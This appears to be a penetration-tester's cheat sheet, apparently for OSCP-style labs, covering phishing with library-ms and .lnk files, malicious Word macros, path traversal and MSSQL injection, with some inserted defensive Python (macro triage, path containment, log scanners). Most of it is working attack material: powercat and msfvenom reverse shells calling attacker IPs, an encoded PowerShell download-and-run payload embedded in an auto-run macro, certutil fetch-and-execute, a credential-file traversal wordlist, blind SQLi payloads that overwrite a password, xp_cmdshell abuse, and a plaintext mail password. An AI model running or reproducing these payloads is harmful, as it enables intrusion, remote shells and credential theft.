Common Exploit
SQLi
CTFish Scenario Supplement
mssql boolean time-based
Directory traversal
Client-side attack
SMB Relay
mssql error

Library-ms and .lnk

  1. Set up the .library-ms file:
python evil-library-ms.py 192.168.45.230 > config.library-ms
  2. Set up the malicious .lnk file:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230:8000/powercat.ps1'); powercat -c 192.168.45.230 -p 443 -e powershell"
  3. Copy the .lnk file to the path where the library-ms file is:
impacket-smbserver share . -user test -password test -smb2support
...
  4. Set up the email body:
nano body.txt
...
  5. Set up the WebDAV server on the path where all the prepped files are:
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
  6. Set up a Python web file server in the directory where powercat is:
python -m http.server 8000
  7. Set up a netcat listener:
nc -lvnp 443
  8. Send the mail - make sure to use --suppress-data and -ap:
sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @config.library-ms --server 192.168.228.189 --body @body.txt --header "Subject: Help Needed!" --suppress-data -ap
...
Username: maildmz@relia.com
Password: DPuBT9tGCBrTbR

To send to multiple users, simply add multiple -t <username>, e.g.:

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

Malicious Macro

Malicious macro enumeration

  1. Search for PDF files on the server:
gobuster dir -u http://trgt1/ -w /usr/share/wordlists/dirb/common.txt -x pdf
  2. Analyze the metadata of the file, looking for usernames, version information, software, etc.:
exiftool test.pdf

Malicious macros 1

part 1: Setup

1: One liner modification: modify the IP address to your attacker address

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

2: Base64 encode payload using powershell

pwsh
$var = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.225/powercat.ps1');powercat -c 192.168.45.225 -p 4444 -e powershell"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)
$Enc = [convert]::ToBase64String($bytes)
$Enc

Example output:

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA
3: Python payload splitter (replace the encoded text with your own encoded payload)

# Encoded command line to split; replace with your own encoded payload
payload = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

# Characters per VBA string fragment (keeps each macro line short)
n = 50

# Emit one VBA concatenation line per fragment
for i in range(0, len(payload), n):
    print("Str = Str + " + '"' + payload[i:i+n] + '"')

Example output:

python macro_splitter.py
Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"
Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
Str = Str + "GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADI"
Str = Str + "ALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAY"
Str = Str + "QB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQB"
Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwA"
Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
Str = Str + "A"

4: Download powercat and host a web server in the directory where powercat was downloaded:

python -m http.server 80

5: Start a listener on the specified port

Part 2: Macro creation

  1. Start a Word document and save it as a .doc file
  2. Reopen the document > View > Macros > View Macros > Create new
  3. Create the malicious macro
    Use the following code, but replace the Str variable with your own payload (output from the macro_splitter.py file):
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
    Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"
    Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
    Str = Str + "GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADI"
    Str = Str + "ALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAY"
    Str = Str + "QB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQB"
    Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwA"
    Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
    Str = Str + "A"

    CreateObject("Wscript.Shell").Run Str
End Sub
  4. Save the macro and the document
  5. Upload the macro file to the server where a client is expected to open it.
    Make sure that part 1 is complete, that powercat is available for download from the attacker host, and that a listener is started
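A defender-side complement to the splitter and encoder above, added here as an example and not part of the original notes: it reverses the two transforms the procedure relies on (the `Str = Str + "..."` fragment concatenation and the UTF-16LE/Base64 encoding that `powershell -e` expects), so an analyst handed a suspicious .doc macro can read what it would run and which auto-run hooks it uses. `triage_macro`, `rebuild_vba_string`, `INDICATORS` and `SAMPLE_MACRO` are this example's own names; the sample macro is constructed around a harmless `Write-Output` command.

```python
import base64
import re


def encode_powershell_command(command):
    """The transform the pwsh snippet in Part 1 performs: UTF-16LE text, then Base64.
    Reproduced here only so the constructed sample can be built offline."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_powershell_command: reveals the command behind a -e argument."""
    return base64.b64decode(b64).decode("utf-16-le")


def rebuild_vba_string(macro_source, var_name="Str"):
    """Joins every `Str = Str + "..."` fragment in source order, undoing the splitter."""
    fragment = re.compile(rf'{var_name}\s*=\s*{var_name}\s*\+\s*"([^"]*)"')
    return "".join(fragment.findall(macro_source))


def extract_encoded_command(command_line):
    """Returns the Base64 blob after -e / -ec / -enc / -EncodedCommand, or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    return m.group(1) if m else None


# Strings an analyst looks for in macro source; the list order is the report order.
INDICATORS = ["AutoOpen", "Document_Open", "Wscript.Shell", "powershell.exe", "-w hidden"]


def triage_macro(macro_source):
    """Reports auto-run/execution indicators, the reconstructed command line and the
    decoded payload (None when the command line carries no encoded command)."""
    command_line = rebuild_vba_string(macro_source)
    # Search the rebuilt command line too, so fragment boundaries cannot hide a string.
    haystack = (macro_source + "\n" + command_line).lower()
    found = [name for name in INDICATORS if name.lower() in haystack]
    encoded = extract_encoded_command(command_line)
    decoded = decode_encoded_command(encoded) if encoded else None
    return {"indicators": found, "command_line": command_line, "decoded": decoded}


# Constructed sample (hypothetical macro, harmless command) in the same shape as the
# macro above: AutoOpen -> MyMacro, 50-character fragments, Wscript.Shell run.
SAMPLE_COMMAND = "Write-Output 'macro triage sample'"


def make_sample_macro(command, chunk=50):
    full = "powershell.exe -nop -w hidden -e " + encode_powershell_command(command)
    lines = [f'    Str = Str + "{full[i:i + chunk]}"' for i in range(0, len(full), chunk)]
    return ("Sub AutoOpen()\n    MyMacro\nEnd Sub\n\n"
            "Sub MyMacro()\n    Dim Str As String\n" + "\n".join(lines) +
            '\n    CreateObject("Wscript.Shell").Run Str\nEnd Sub\n')


SAMPLE_MACRO = make_sample_macro(SAMPLE_COMMAND)

if __name__ == "__main__":
    report = triage_macro(SAMPLE_MACRO)
    print("indicators:", ", ".join(report["indicators"]))
    print("command line:", report["command_line"])
    print("decoded payload:", report["decoded"])
```

Run it against a macro dumped with olevba or copied out of the VBA editor; the decoded payload is what an EDR would see powershell.exe start with, so it is the string to hand to detection engineering rather than the Base64 blob.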

Malicious Macro 2 (Single line Macro)

  1. Generate a reverse shell with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o revshell.exe
  2. Base64 encode the command:
pwsh
$var = "certutil.exe -f -urlcache http://192.168.37.130/revshell.exe revshell.exe; .\revshell.exe"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)
$Enc = [convert]::ToBase64String($bytes)
$Enc
  3. Create a macro called MyMacro, use the following code and save as .doc:
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADMANwAuADEAMwAwAC8AcgBlAHYAcwBoAGUAbABsAC4AZQB4AGUAIAByAGUAdgBzAGgAZQBsAGwALgBlAHgAZQA7ACAALgBcAHIAZQB2AHMAaABlAGwAbAAuAGUAeABlAA=="
    CreateObject("Wscript.Shell").Run Str
End Sub
  4. Start a listener on the attacker machine on the LPORT
  5. Deliver the malicious macro to the victim

Malicious Macro 3 (GitHub macro generator, PowerShell reverse shell)

  1. Clone the generator:
git clone https://github.com/glowbase/macro_reverse_shell
  2. Generate the macro code:
python generate.py LHOST LPORT
  3. Copy the macro code to a document and save it as a .doc file
  4. Upload the malicious document

path traversal

Windows wordlist

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SOFTWARE
C:\Windows\System32\config\DEFAULT
C:\Windows\NTDS\NTDS.dit
C:\Users\Administrator\NTUSER.DAT
C:\Users\<username>\NTUSER.DAT
C:\Users\<username>\AppData\Local\Microsoft\Credentials
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\<username>\.ssh\id_rsa
C:\Users\<username>\.ssh\id_rsa.pub
C:\Users\<username>\.ssh\authorized_keys
C:\inetpub\wwwroot\web.config
C:\Program Files\OpenSSH\sshd_config
C:\Program Files (x86)\OpenSSH\sshd_config
C:\Windows\System32\Tasks\
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\Windows\repair\SOFTWARE
C:\Windows\repair\SECURITY
C:\Windows\repair\DEFAULT
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\
C:\Windows\Panther\Unattend.xml
C:\Windows\debug\NetSetup.log
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\drivers\etc\lmhosts.sam
C:\Windows\System32\drivers\etc\networks
C:\Windows\System32\drivers\etc\protocol
C:\Windows\System32\drivers\etc\services
C:\Windows\System32\config\TxR\*
C:\Windows\System32\spool\PRINTERS\
C:\Windows\System32\FxsTmp\
C:\Windows\Temp\
C:\Windows\Prefetch\
C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
C:\inetpub\temp\IIS Temporary Compressed Files\
C:\Windows\iis.log
C:\Windows\WindowsUpdate.log
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
for l in $(cat lfi_wordlist.txt); do curl "http://$trgt1/path?param=$l"; echo -e "\n---> Next request: $l\n\n"; done
curl -s "http://url/page?param=/proc/self/cmdline" | tr '\000' ' ' | cut -c115- | rev | cut -c32- | rev

Error-based mssql


The web app allows you to submit URLs or paths that are accessed by server-side processes; this can trigger network communications.

webapp with UNC path

e.g. webapp, cms, etc.

info

#!/bin/bash

# This script loops through the PID range 1-50,000 to look for existing process files on the target via LFI/directory traversal

# If the absolute path works, then supply the URL like so: http://url/path?param=
# If it doesn't work, then supply the traversal prefix as shown: http://$trgt1/path?param=../../../../../..
# Check if the user provided a URL as an argument
if [ -z "$1" ]; then
  echo "Usage: ./script.sh http://url/page?param="
  exit 1
fi

# Store the base URL provided by the user
url="$1"

# Loop through process IDs (PIDs)
for i in $(seq 1 50000); do 
  path="/proc/${i}/cmdline" # Path to the cmdline file of the process
  skip_start=$(( 3 * ${#path} + 1 )) # Skip the start based on the path length
  skip_end=32 # Skip the last 32 characters
  
  # Send the HTTP request and process the result
  res=$(curl -s "${url}${path}" -o- | tr '\000' ' ') 
  output=$(echo $res | cut -c ${skip_start}- | rev | cut -c ${skip_end}- | rev) 
  
  # If the output is not empty, print the PID and the command line arguments
  if [[ -n "$output" ]]; then 
    echo "${i}: ${output}" 
  fi 
done
# This works well on the back of lfienum.sh
# Clean up the output - drop PIDs whose cmdline came back empty
with open("procs.txt", "r") as f:
    for l in f.readlines():
        # An empty cmdline leaves the path immediately followed by the page's trailing "window.close()"
        if "cmdlinewindow" in l.split("/")[-1]:
            continue
        pid = l.split(":")[0]
        if "window.close()\n" in l:
            # Keep only the command line: drop the echoed path and the trailing page markup
            print(pid + ":\t" + l.split("cmdline")[-1].replace("window.close()", "").strip())
        else:
            print(pid + ":\t" + l.strip())
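Added example, not part of the original notes, covering the other side of the traversal and /proc enumeration above: a path-containment check of the kind that stops the `../../../../etc/passwd` and `/proc/self/cmdline` requests from ever leaving the intended directory, plus a scanner that flags those request shapes in access-log lines. The base directory, log lines and the names `resolve_within`, `is_safe_request`, `flag_traversal` and `scan_log` are this example's own constructions.

```python
import re
from pathlib import Path
from urllib.parse import unquote


def resolve_within(base_dir, requested):
    """Maps a user-supplied relative path onto base_dir and returns the absolute path,
    or raises PermissionError if the result would leave base_dir.
    `requested` is the already URL-decoded parameter value."""
    if "\x00" in requested:
        raise PermissionError("null byte in requested path")
    base = Path(base_dir).resolve()
    # Joining an absolute request (/etc/passwd) discards base; resolve() collapses
    # every '..' segment and follows symlinks, so the containment check is made on
    # the real target, not on the string the client sent.
    candidate = (base / requested).resolve()
    if base not in candidate.parents:
        raise PermissionError(f"{requested!r} resolves outside {base}")
    return candidate


def is_safe_request(base_dir, requested):
    try:
        resolve_within(base_dir, requested)
        return True
    except PermissionError:
        return False


# Request shapes seen in the wordlists and loops above: dot-dot segments, procfs
# reads, and the best-known sensitive files.
TRAVERSAL_PATTERNS = [
    (re.compile(r"\.\.[\\/]"), "dot-dot traversal"),
    (re.compile(r"/proc/(self|\d+)/", re.I), "procfs read"),
    (re.compile(r"(/etc/(passwd|shadow)\b|windows[\\/]system32[\\/]config[\\/])", re.I),
     "sensitive file"),
]


def flag_traversal(raw_request_line):
    """Decodes twice (catches %252e-style double encoding) and returns matched labels."""
    decoded = unquote(unquote(raw_request_line))
    return [label for pattern, label in TRAVERSAL_PATTERNS if pattern.search(decoded)]


# Constructed access-log lines (hypothetical host and parameter, not from any target)
SAMPLE_LOG = [
    '10.0.0.9 - - [01/Sep/2024:12:00:01 +0000] "GET /view?file=report.pdf HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Sep/2024:12:00:02 +0000] "GET /view?file=../../../../etc/passwd HTTP/1.1" 200 2310',
    '10.0.0.9 - - [01/Sep/2024:12:00:03 +0000] "GET /view?file=..%2f..%2f..%2fproc%2fself%2fcmdline HTTP/1.1" 200 118',
    '10.0.0.9 - - [01/Sep/2024:12:00:04 +0000] "GET /view?file=..%252f..%252fWindows%252fSystem32%252fconfig%252fSAM HTTP/1.1" 404 210',
]


def scan_log(lines):
    """Returns (line number, labels) for every line matching at least one pattern."""
    hits = []
    for number, line in enumerate(lines, start=1):
        labels = flag_traversal(line)
        if labels:
            hits.append((number, labels))
    return hits


if __name__ == "__main__":
    for number, labels in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}")
    print(is_safe_request("/srv/app/uploads", "../../../../etc/passwd"))
```

The containment check deliberately compares resolved paths rather than rejecting the substring `..`, which is the filter that `..%2f`, `....//` and double-encoded variants are built to slip past; the log scanner decodes twice for the same reason.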

Update record

In error-based SQL injection, the approach involves crafting queries that deliberately cause errors when certain conditions are true. By observing the errors, or their absence, in the response, you can infer information about the database structure or data.


guess table names: user, users etc.

find column names

enum no of cols

enum table name

Detailed Breakdown

Line 1:

'; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--

  • select count(name): This retrieves the count of tables with the name 'users' from the sys.tables view.
    • name: This is the name of the table in the database. sys.tables holds metadata about each table, and one of its columns is name, representing the table name.
  • sys.tables: A system view in SQL Server that contains a row for each table in the current database. It holds information such as the table's name, its ID, creation date, etc.
  • where name = 'users': This condition filters the result to only the table named 'users'. If this table exists, the query returns 1.
  • IF ((select count(name) ...) = 1): The outer IF checks if the count equals 1, meaning the table 'users' exists.
  • WAITFOR DELAY '0:0:10': If the condition is true, the server waits for 10 seconds. This tells the attacker that the users table exists based on the observed delay.
  • ';--: The ';-- terminates the current query and comments out any remaining part of the original query, preventing it from executing.

Line 2:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>2) WAITFOR DELAY '0:0:10';--

  • sys.columns c: sys.columns is a system view that holds information about each column in every table of the database. Here, c is an alias for this view, allowing it to be referred to as c in the query. The important field here is c.name, which represents the name of each column.
  • sys.tables t: sys.tables is again used to access metadata about tables, and t is an alias for it.
  • c.object_id = t.object_id: object_id is a unique identifier for each object (table, view, etc.) in SQL Server. Here, the query joins sys.columns (c) and sys.tables (t) using object_id to link columns to their respective tables.
    • Explanation: This join ensures that the query only fetches columns that belong to the 'users' table.
  • t.name = 'users': This restricts the results to columns in the users table.
  • select count(c.name): This counts the number of columns in the users table.
  • IF ... > 2: The IF statement checks if the users table has more than 2 columns. If true, the server waits for 10 seconds.
    • Purpose: This helps the attacker infer the number of columns in the users table by observing the delays.

Line 3:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>3) WAITFOR DELAY '0:0:10';--

  • Same logic as line 2, but it checks if the users table has more than 3 columns.
    • Purpose: The attacker is progressively gathering more information about the table structure, confirming how many columns exist by introducing incremental checks.

Line 4:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--

  • c.name = 'username': This condition checks if there is a column named 'username' in the users table.
  • IF ... = 1: If this column exists, the query causes a 10-second delay.
    • Purpose: The attacker is verifying the presence of a specific column (username), a critical piece of information for later stages of the attack.

Line 5:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--

  • c.name like 'pass%': This checks if any column in the users table starts with 'pass'.
    • The attacker is likely trying to locate a password-related column (e.g., password, password_hash, etc.).
    • The % is a wildcard character, matching any sequence of characters that follow 'pass'.
  • IF ... = 1: If a column starting with 'pass' exists, the query causes a 10-second delay.

Line 6:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'passw%')=1) WAITFOR DELAY '0:0:10';--

  • c.name like 'passw%': This further narrows the search to columns starting with 'passw'. The attacker is refining the search for the password column.
  • IF ... = 1: If a column starting with 'passw' exists, the query triggers a 10-second delay.

Lines 7-10:

Each subsequent line refines the search for a password-related column by progressively matching longer strings, moving from 'passwo%' (line 7) to 'password_%' (line 10). Each step of this process is designed to pinpoint a column likely containing password data.

  • password: By this point, the attacker is trying to identify a column named exactly password or with a similar name like password_hash.
  • Delays: Each matching condition results in a 10-second delay, which confirms whether the target column exists.

Line 11:

'; update users set password_hash = 'tacos123' where username = 'butch';--

  • update users set password_hash = 'tacos123' where username = 'butch':
    • This is an UPDATE statement that modifies the users table.
    • set password_hash = 'tacos123': This changes the password_hash of the user 'butch' to 'tacos123'.
    • where username = 'butch': The WHERE clause ensures that only the row corresponding to the username 'butch' is updated.
    • If successful, the attacker can now log in as 'butch' with the password 'tacos123'.

Key Points of the Attack:

  • Stealthy Information Gathering: The attacker incrementally gathers information about the database's structure using time-based delays. By observing how long the system waits, the attacker confirms the existence of specific tables and columns.
  • Focus on Critical Columns: The attack centers on identifying the username and password columns in the users table.
  • Privilege Escalation: Once enough information is gathered, the attacker updates the password for a specific user, potentially gaining unauthorized access to the system.
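Added example (not from the original notes) showing, in Python with the standard-library sqlite3 module, why a concatenated query is vulnerable and what the parameterised form does with the same input, plus a small log scanner that flags the probe shapes used in the lines above (WAITFOR DELAY, sys.tables/sys.columns lookups, forced 1/0 errors, stacked UPDATEs). The table contents, log lines and the names `build_db`, `login_vulnerable`, `login_safe`, `flag_request` and `scan_log` are this example's own constructions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


# --- 1. Why the injections above work: string-built SQL versus bound parameters ---

def build_db():
    """Constructed in-memory sample with placeholder hashes; not data from any target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "butch", "hash-of-butch"), (2, "alice", "hash-of-alice")])
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds the statement by concatenation: a quote in the input closes the string
    literal and the rest of the input is parsed as SQL."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password_hash):
    """Binds the input as parameters: it is compared as literal text, never parsed."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(sql, (username, password_hash))]


# --- 2. Spotting the enumeration pattern in web access logs ---

PROBE_PATTERNS = [
    (re.compile(r"waitfor\s+delay", re.I), "time-based probe"),
    (re.compile(r"\bsys\.(tables|columns)\b", re.I), "schema enumeration"),
    (re.compile(r"select\s+1\s*/\s*0", re.I), "error-based probe"),
    (re.compile(r"\bor\b\s+1\s*=\s*1", re.I), "tautology"),
    (re.compile(r"\bupdate\s+\w+\s+set\b", re.I), "data modification"),
]


def flag_request(raw_log_line):
    """URL-decodes the line and returns the label of every probe pattern it matches."""
    decoded = unquote_plus(raw_log_line)
    return [label for pattern, label in PROBE_PATTERNS if pattern.search(decoded)]


# Constructed access-log lines (hypothetical host and parameter, not from any target)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2024:10:00:01 +0000] "GET /login?user=butch HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Sep/2024:10:00:07 +0000] "GET /login?user=%27%3B+IF+((select+count(name)+from+sys.tables+where+name%3D%27users%27)%3D1)+WAITFOR+DELAY+%270%3A0%3A10%27%3B-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Sep/2024:10:00:09 +0000] "GET /login?user=%27+AND+1%3D(SELECT+CASE+WHEN+EXISTS+(SELECT+*+FROM+sys.tables+WHERE+name%3D%27users%27)+THEN+1+ELSE+(SELECT+1/0)+END)-- HTTP/1.1" 500 180',
    '10.0.0.5 - - [01/Sep/2024:10:00:12 +0000] "GET /login?user=%27%3B+update+users+set+password_hash%3D%27x%27+where+username%3D%27butch%27%3B-- HTTP/1.1" 200 512',
]


def scan_log(lines):
    """Returns (line number, labels) for every line that matches at least one pattern."""
    hits = []
    for number, line in enumerate(lines, start=1):
        labels = flag_request(line)
        if labels:
            hits.append((number, labels))
    return hits


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", login_vulnerable(conn, "' OR 1=1--", "wrong"))
    print("safe:      ", login_safe(conn, "' OR 1=1--", "wrong"))
    for number, labels in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}")
```

sqlite3 refuses a second statement after `;`, so the stacked `'; IF ... WAITFOR DELAY` form from the breakdown cannot be reproduced with it; SQL Server executes stacked statements, which is what those payloads depend on. The tautology `' OR 1=1--` needs no second statement and shows the same root cause: with concatenation it returns every row, with parameters it returns none.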


mssql-time based blind

MS-SQL Methods

NetNTLMv2 Challenge Response

sudo responder -I tun0 -v -A
'; exec xp_dirtree "\\<attacker_ip>\test";--

Check if you have a user account's hash. If it's a machine account it's unlikely to be crackable.

XP_CMDShell

';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
touch test.txt
python -m http.server 80
';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.230/test.txt';--
python pwsh_encoded_revshell.py $trgt1 4444
nc -lvnp 4444
';EXEC xp_cmdshell 'powershell -nop -w hidden -e JABjAGwAaQBlAG4Ad...';--

Remote Mouse 3.008
/uploads folder - download the strange .exe file

exiftool the file

Company Name/File Description/Product Name/Product Version

Searchsploit remote mouse 3.008

Client-Side Attack (Office Macros)
/uploads folder
"only .doc file allowed" or something similar when uploading

Information Disclosure - FTP - Diskboss CVE (#path2)

  1. Webapp recon
    website says: "add a .hta file to FTP with the user: 'mildred' password:'Ab0min4tion' "
  2. Create a malicious .hta file
    msfvenom -p windows/shell_reverse_tcp -f hta-psh -o evil.hta LPORT=443 LHOST=tun0
  3. Upload this file to FTP with the credentials provided
nc -lvnp 443
ftp $trgt1
put evil.hta
  1. Web application
  2. Webapp Tech Version
  3. Webapp CVE
    php, aspx, jsp etc.
  4. Webshell
  5. Webshell to Reverseshell

Information Disclosure - FTP - Diskboss CVE (#path2)

  1. Webapp recon
  2. User+domain Discovery
  3. Add domain name (DC) to /etc/hosts
    e.g. 10.10.1.200 oscp.lab
  4. Password Spray FTP using user, if that doesn't work, then try user@oscp.lab
